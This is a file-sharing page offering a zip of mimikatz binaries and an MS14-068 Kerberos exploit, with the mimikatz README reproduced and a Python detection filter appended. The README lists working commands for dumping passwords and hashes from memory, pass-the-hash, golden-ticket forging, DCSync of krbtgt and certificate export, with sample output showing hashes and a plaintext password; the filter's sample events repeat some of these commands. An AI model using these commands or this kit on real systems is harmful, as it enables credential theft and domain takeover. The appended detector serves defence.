mimikatz,ms14068

  • x6_365323
    About the author
  • 6.9MB
    File size
  • zip
    File format
  • 0
    Favorites
  • VIP exclusive
    Resource type
  • 0
    Downloads
  • 2022-06-02 21:04
    Upload date
教程跟工具.zip
  • 14068py.exe
    6.1MB
  • mimikatz_trunk
  • Win32
  • mimilove.exe
    23.5KB
  • mimilib.dll
    25KB
  • mimidrv.sys
    29.4KB
  • mimikatz.exe
    314KB
  • kiwi_passwords.yar
    2.8KB
  • x64
  • mimilib.dll
    28.5KB
  • mimidrv.sys
    35.9KB
  • mimikatz.exe
    413KB
  • README.md
    4.7KB
  • ms14-068过程.txt
    3.6KB
  • ms-14-068过程.exe
    4.9MB
Content description
# mimikatz

**`mimikatz`** is a tool I've made to learn `C` and make some experiments with Windows security.

It's now well known to extract plaintext passwords, hashes, PIN codes and kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.

```
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 13 modules * * */

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...
```

But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of information in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, _yes_).

If you don't want to build it, binaries are available on https://github.com/gentilkiwi/mimikatz/releases

## Quick usage

```
log
privilege::debug
```

### sekurlsa

```
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
```

### kerberos

```
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
```

### crypto

```
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
```

### vault & lsadump

```
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
```

## Build

`mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:

* for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 & x64** - http://www.microsoft.com/download/details.aspx?id=44914)
* _for `mimikatz driver`, `mimilove` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_

`mimikatz` uses `SVN` for source control, but is now available with `GIT` too! You can use any tools you want to sync, even the `GIT` support incorporated in Visual Studio 2013 =)

### Synchronize!

* GIT URL is : https://github.com/gentilkiwi/mimikatz.git
* SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk
* ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip

### Build the solution

* After opening the solution, `Build` / `Build Solution` (you can change architecture)
* `mimikatz` is now built and ready to be used! (`Win32` / `x64`)
  * you can have error `MSB3073` about `_build_.cmd` and `mimidrv`, it's because the driver cannot be built without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK.

### ddk2003

With this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies).

For this optional platform, Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.

Follow instructions:

* http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
* _http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_

## Licence

CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

## Author

* Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
* DCSync function in `lsadump` module was co-written with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )

This is a **personal** development, please respect its philosophy and don't use it for bad things!
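
A defensive counterpart to the Quick usage list, as an added example that is not part of the mimikatz README or project: a Python filter that flags `module::command` tokens for the modules named above in process-creation command lines, whatever the executable is called. The event field names (`Host`, `Image`, `CommandLine`) and the sample events are constructed assumptions.

```python
import re

# Module names listed under "Quick usage" in the README above.
MODULES = ("privilege", "sekurlsa", "kerberos", "crypto", "vault", "token", "lsadump")

# module::command, case-insensitive. The lookbehind rejects longer identifiers
# such as "mycrypto::init" and nested scopes such as "a::token::x".
TOKEN = re.compile(r"(?<![\w:])(" + "|".join(MODULES) + r")::([a-z]+)", re.IGNORECASE)


def find_mimikatz_commands(command_line):
    """Return the sorted, de-duplicated module::command tokens in one command line."""
    return sorted({f"{m}::{c}".lower() for m, c in TOKEN.findall(command_line)})


def scan(events):
    """Return one alert per process-creation event whose command line matches."""
    alerts = []
    for event in events:
        hits = find_mimikatz_commands(event.get("CommandLine", ""))
        if hits:
            alerts.append({"host": event.get("Host"), "image": event.get("Image"), "hits": hits})
    return alerts


# Constructed sample events (not real telemetry); field names are assumptions.
SAMPLE_EVENTS = [
    {"Host": "ws01", "Image": r"C:\Users\Public\svc.exe",
     "CommandLine": r'C:\Users\Public\svc.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"Host": "ws02", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\tools"},
    {"Host": "dc01", "Image": r"C:\Temp\m.exe",
     "CommandLine": r'C:\Temp\m.exe "LSADUMP::DCSync /user:lab\krbtgt /domain:lab.local" exit'},
    {"Host": "dev01", "Image": r"C:\build\cl.exe",
     "CommandLine": r"cl.exe /DNS=mycrypto::init main.cpp"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["host"], alert["image"], ", ".join(alert["hits"]))
```

Commands typed at the interactive `mimikatz #` prompt never reach the process command line, so this filter only covers invocations that pass commands as arguments.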